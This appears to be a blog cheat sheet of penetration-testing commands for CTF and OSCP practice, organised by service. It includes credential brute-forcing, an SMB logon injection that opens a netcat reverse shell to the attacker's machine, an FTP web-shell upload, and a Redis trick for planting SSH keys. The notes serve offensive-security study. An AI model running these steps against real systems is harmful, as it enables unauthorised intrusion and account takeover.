Adithyan's Blog
Disclaimer: These notes are not in the context of any machines I had during the OSCP lab or exam. This is purely my experience with CTFs, TryHackMe, VulnHub, and HackTheBox prior to enrolling in OSCP. This is an approach I came up with while researching offensive security. It contains content from other blogs for my quick reference.
Port Scanning:
nmap -sC -sV -oA nmap -A -T5 10.10.10.x
Host Discovery
• nmap -sn -vv -oA hosts <range>
• netdiscover -r <range>
DNS server discovery
• nmap -p 53 -vv -oA dcs <range>
NSE Scripts Scan
* nmap -sV --script=vulscan/vulscan.nse <ip>
Port specific NSE script list:
ls /usr/share/nmap/scripts/ssh*
ls /usr/share/nmap/scripts/smb*
Scanning all 65535 ports:
masscan -p1-65535,U:1-65535 --rate=1000 10.10.10.x -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
nmap -Pn -sV -sC -p$ports 10.10.10.x
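The port-extraction step above, rewritten as a reusable shell function (an added example, not from the original notes): it reads masscan's stdout lines, also accepts masscan's -oL list format (format knowledge assumed from masscan's own output, not from this page), drops unrelated lines instead of turning them into junk ports, and lists a port seen on both TCP and UDP only once. The sample input is constructed.

```shell
#!/bin/sh
# Added example (not from the original notes): build the comma-separated
# port list that the nmap -p$ports step expects from masscan's output.
# Handles two masscan line formats (assumed from masscan's own output):
#   stdout:    Discovered open port 22/tcp on 10.10.10.5
#   -oL list:  open tcp 22 10.10.10.5 1700000000
# A port seen on both tcp and udp is listed once, and unrelated lines
# (banners, '#' comments, blanks) are ignored rather than mis-parsed.
ports_from_masscan() {
    # $1: file containing masscan output
    awk '
        /^Discovered open port/ { split($4, a, "/"); print a[1] }
        /^open (tcp|udp) /      { print $3 }
    ' "$1" | sort -nu | paste -sd, -
}

# Constructed sample input for a stand-alone run.
sample=$(mktemp)
cat > "$sample" <<'EOF'
Discovered open port 445/tcp on 10.10.10.5
Discovered open port 22/tcp on 10.10.10.5
Discovered open port 53/udp on 10.10.10.5
Discovered open port 53/tcp on 10.10.10.5
Discovered open port 80/tcp on 10.10.10.5
EOF
ports=$(ports_from_masscan "$sample")
rm -f "$sample"
echo "$ports"   # 22,53,80,445
# Feed the result to the follow-up scan, e.g.:
# nmap -Pn -sV -sC -p"$ports" 10.10.10.5
```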
Running specific NSE scripts:
nmap -Pn -sC -sV --script='vuln*.nse' -p$ports 10.10.10.x -T5 -A
-sC: default scripts; -sV: version detection; -oA: output in all formats
Optional: -sT performs a full TCP connect scan instead of a SYN scan, to avoid getting flagged by firewalls.
To get from an Apache version to the Ubuntu release that ships it, search for "ubuntu httpd versions".
FTP (Port 21):
  • anonymous login check
    • ftp <ip address>
    • username: anonymous
    • password: anonymous
    • file upload -> put shell.php
SSH (Port 22):
  • Public key: can be placed in the target user's authorized_keys to allow login.
  • id_rsa: private key used for login. It may be passphrase-protected; the passphrase can be cracked with ssh2john and john.
  • ssh -i id_rsa <user>@<ip>
  • For passwordless login, add your public key to the target's authorized_keys.
  • ssh2john
DNS Zone transfer check (Port 53):
RPC Bind (111):
rpcclient --user="" --command=enumprivs -N <ip>
rpcinfo -p <ip>
rpcbind -p
RPC (135):
  • <ip> -p 135
  • <ip> -p 135 | grep ncacn_np   // get pipe names
  • ncacn_ip_tcp:[135]
SMB (139 & 445):
nmap --script smb-protocols <ip>
smbclient -L //<ip>
smbclient -L //<ip> -N   // no password (SMB null session)
smbclient --no-pass -L <ip>
smbclient //<ip>/<share>
smbmap -H <ip>
smbmap -H <ip> -u '' -p ''
smbmap -H <ip> -s share_name
crackmapexec smb <ip> -u '' -p '' --shares
crackmapexec smb <ip> -u 'sa' -p '' --shares
crackmapexec smb <ip> -u 'sa' -p 'sa' --shares
crackmapexec smb <ip> -u '' -p '' --share share_name
crackmapexec smb <ip> -u '' -p '' --shares --pass-pol
enum4linux -a <ip>
rpcclient -U "" <ip>
* enumdomusers
* enumdomgroups
* queryuser [rid]
* getdompwinfo
* getusrdompwinfo [rid]
ncrack -u username -P rockyou.txt -T 5 -p smb -v <ip>
mount -t cifs "//<ip>/<share>" /mnt/wins
mount -t cifs "//<ip>/<share>" /mnt/wins -o vers=1.0,user=root,uid=0,gid=0
SMB Shell to Reverse Shell:
smbclient -U "username%password" //<ip>/<share>
smb: \> logon "/=nc <attack box ip> 4444 -e /bin/bash"
Checklist:
* Samba symlink directory traversal attack
SMB Exploits:
SNMP (161):
  • snmpwalk -c public -v1 <ip>
  • snmpcheck -t 192.168.1.X -c public
  • onesixtyone -c names -i hosts
  • nmap -sT -p 161 192.168.X.X -oG snmp_results.txt
  • snmpenum -t 192.168.1.X
IRC (194,6667,6660-7000)
NFS (2049)
MySQL (3306):
  • nmap -sV -Pn -vv -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <ip>
Redis (6379)
In the output of config get * you can find the home directory of the redis user (usually /var/lib/redis or /home/redis/.ssh); knowing this, you know where you can write an authorized_keys file to gain SSH access as the redis user. If you know the home directory of another valid user and have write permission there, you can abuse it the same way:
  1. Generate an SSH public-private key pair on your machine: ssh-keygen -t rsa
  2. Write the public key to a file: (echo -e "\n\n"; cat ./.ssh/<public-key-file>; echo -e "\n\n") > foo.txt
  3. Import the file into redis: cat foo.txt | redis-cli -h <ip> -x set crackit
  4. Save the public key to the authorized_keys file on the redis server:
root@Urahara:~# redis-cli -h <ip>
> config set dir /home/test/.ssh/
OK
> config set dbfilename "authorized_keys"
OK
> save
Port Knocking:
knock -v <ip> 4 27391 159
knock -v <ip> 4 27391 159 -u
knock -v <ip> 159:udp 27391:tcp 4:udp
Misc: